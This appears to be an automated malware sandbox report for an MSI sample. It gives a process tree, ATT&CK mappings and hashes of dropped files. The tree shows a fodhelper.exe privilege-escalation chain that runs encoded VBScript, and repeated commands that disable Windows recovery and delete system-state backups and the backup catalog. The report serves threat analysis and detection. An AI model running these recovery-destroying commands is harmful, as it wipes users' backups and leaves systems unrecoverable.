PID 3076 wrote to memory of 3496	3076	cmd.exe	fodhelper.exe
PID 3076 wrote to memory of 3496	3076	cmd.exe	fodhelper.exe
PID 3496 wrote to memory of 2352	3496	fodhelper.exe	wscript.exe
PID 3496 wrote to memory of 2352	3496	fodhelper.exe	wscript.exe
PID 2452 wrote to memory of 2972	2452	cmd.exe	fodhelper.exe
PID 2452 wrote to memory of 2972	2452	cmd.exe	fodhelper.exe
PID 2972 wrote to memory of 2664	2972	fodhelper.exe	wscript.exe
PID 2972 wrote to memory of 2664	2972	fodhelper.exe	wscript.exe
PID 3460 wrote to memory of 1852	3460	cmd.exe	fodhelper.exe
PID 3460 wrote to memory of 1852	3460	cmd.exe	fodhelper.exe
PID 1852 wrote to memory of 2124	1852	fodhelper.exe	wscript.exe
PID 1852 wrote to memory of 2124	1852	fodhelper.exe	wscript.exe
PID 1628 wrote to memory of 2436	1628	cmd.exe	fodhelper.exe
PID 1628 wrote to memory of 2436	1628	cmd.exe	fodhelper.exe
PID 2436 wrote to memory of 1496	2436	fodhelper.exe	wscript.exe
PID 2436 wrote to memory of 1496	2436	fodhelper.exe	wscript.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2384
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5052
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/kihasafq
      4⤵
      PID:3468

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3284
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3284 -s 956
  2⤵
  - Program crash
  PID:4628

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:4292
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3076
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/msdgmecw
      4⤵
      PID:2352

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2124

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4072

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3700
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3460
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1852
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/nvfafnxjwgi
      4⤵
      PID:2124

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3544

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3452
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2452
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/nvfafnxjwgi
      4⤵
      PID:2664

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:2676
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4812
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1712
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/odlxbqcwocu
      4⤵
      PID:4948

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:2668
- C:\Windows\system32\msiexec.exe
  msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\508e8538c481ab57bb700d88ccc5ad644c8e2348f7612eadcb1e536f27aba1df.msi
  2⤵
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2268
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/tynbvelyp
      4⤵
      PID:2008

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
PID:2484
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1628
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2436
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/dvhdhhr
      4⤵
      PID:1496

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
PID:2396
- C:\Windows\System32\cmd.exe
  /c fodhelper.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Windows\System32\fodhelper.exe
    fodhelper.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:372
  - - C:\Windows\system32\wscript.exe
      "wscript.exe" /B /E:VBScript.Encode ../../Users/Public/odlxbqcwocu
      4⤵
      PID:2356

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148
- C:\Windows\System32\MsiExec.exe
  C:\Windows\System32\MsiExec.exe -Embedding F85B0F5BE3631122BE7C5487FE6F0502 C
  2⤵
  - Modifies extensions of user files
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1800
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:4280

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3284 -ip 3284
1⤵
PID:4736

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Checks SCSI registry key(s)
PID:4684

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3016

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:2284

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:3748

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3052

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
PID:3324

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4936

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:4068

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3944

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3216

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:1076

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:4464

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3592

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4116

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:3924

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:3552

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1520

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:872

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4648

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:5116

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4884

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:796

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4948

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:1472

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:2984

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:8

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4036

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
- Drops file in Windows directory
PID:3228

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:3984

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:332

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:2068

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4116

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy ignoreallfailures
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:4244

C:\Windows\system32\wbadmin.exe
wbadmin delete catalog -quiet
1⤵
- Process spawned unexpected child process
- Deletes backup catalog
PID:4536

C:\Windows\system32\wbadmin.exe
wbadmin delete systemstatebackup -quiet
1⤵
- Process spawned unexpected child process
- Deletes System State backups
PID:1988

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
1⤵
- Process spawned unexpected child process
- Modifies boot configuration data using bcdedit
PID:1464

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\MSIB105.tmp

Filesize
108KB

MD5
6584147067e0dd70298383a3dcbeea48

SHA1
8717aa19f309dc8c03337edd0e6a2f28e950a5b1

SHA256
284d2cb961a72db2b4e91508537d8712eb08eeb858d96d6924eb28fd57fee3b4

SHA512
7e3b2c838d2d6de89d3cf30f9fb0c580e0f69cf179240072a11fa9afb4123a4a07f8848a962df83ca89e473a19444b4951e6cbaedb6d2715fc6471f0c335e968

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSIB105.tmp

Filesize
108KB

MD5
6584147067e0dd70298383a3dcbeea48

SHA1
8717aa19f309dc8c03337edd0e6a2f28e950a5b1

SHA256
284d2cb961a72db2b4e91508537d8712eb08eeb858d96d6924eb28fd57fee3b4

SHA512
7e3b2c838d2d6de89d3cf30f9fb0c580e0f69cf179240072a11fa9afb4123a4a07f8848a962df83ca89e473a19444b4951e6cbaedb6d2715fc6471f0c335e968

Download Submit
C:\Users\Public\dvhdhhr

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
C:\Users\Public\kihasafq

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
C:\Users\Public\msdgmecw

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
C:\Users\Public\nvfafnxjwgi

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
C:\Users\Public\odlxbqcwocu

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
C:\Users\Public\tynbvelyp

Filesize
863B

MD5
c6f826f4894ddc35f0d4c75eb878a124

SHA1
43be6117c59f50b84a658aea90435b352080297b

SHA256
6834b78aff9fdd78afbc9e2aa505d6026e88dfe971a8bf4facf4596f5d3a6208

SHA512
93f24c73364f2cb3190ae14852309dcea2070c7e6984a5328e8dfe29863a8247e4548249fc8a2d8c258e6a1f00f27f8f4ef2436226d86cf9e7d59fc9d9fbc2f4

Download Submit
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

Filesize
23.0MB

MD5
7f7a59ad77f17f4b5e3771c97bcaab22

SHA1
f801d65946d7d5215d072a23347e5f33895069ad

SHA256
d8cd71d0cc9ddd54beb0bc80ac3aefc6c239df870ccc78c660726afde0d8da2b

SHA512
807e7dc47ecf2a4055c62b1e864a7b455a4cc09eb9b33bd5ee9a63c445484cc872bae01645b923395f405c070abcee0ae5fafb9935c050731897acd4791234da

Download Submit
\??\Volume{c8b84e5a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{c9c700c1-3b3e-45af-9f25-eb9511a0c84a}_OnDiskSnapshotProp

Filesize
5KB

MD5
7f99eb95fc42787835359abff17567ce

SHA1
50d209d8a48bd5dd052f2b0d92e5d136baade6e8

SHA256
3efb14f69a5154ab4d04d5f0e623b165e194e7705b99b653410632b31bbfc624

SHA512
17ca04ef21254fb32c80e61f1de418762a97fff963f16e8b013a4106ba39503f231b07292ce3edf53c27d798c2eed7d17f01da33a72690644b8d0f25c1fa7ad7

Download Submit
memory/372-138-0x0000000000000000-mapping.dmp

Download
memory/1496-158-0x0000000000000000-mapping.dmp

Download
memory/1712-141-0x0000000000000000-mapping.dmp

Download
memory/1800-133-0x000001DBBB630000-0x000001DBBB643000-memory.dmp

Filesize
76KB

Download
memory/1800-130-0x0000000000000000-mapping.dmp

Download
memory/1852-155-0x0000000000000000-mapping.dmp

Download
memory/2008-147-0x0000000000000000-mapping.dmp

Download
memory/2124-156-0x0000000000000000-mapping.dmp

Download
memory/2268-134-0x000001BD98F50000-0x000001BD98F5A000-memory.dmp

Filesize
40KB

Download
memory/2352-150-0x0000000000000000-mapping.dmp

Download
memory/2356-139-0x0000000000000000-mapping.dmp

Download
memory/2436-157-0x0000000000000000-mapping.dmp

Download
memory/2552-146-0x0000000000000000-mapping.dmp

Download
memory/2664-153-0x0000000000000000-mapping.dmp

Download
memory/2972-152-0x0000000000000000-mapping.dmp

Download
memory/3468-144-0x0000000000000000-mapping.dmp

Download
memory/3496-149-0x0000000000000000-mapping.dmp

Download
memory/4280-135-0x0000000000000000-mapping.dmp

Download
memory/4472-143-0x0000000000000000-mapping.dmp

Download
memory/4948-142-0x0000000000000000-mapping.dmp

Download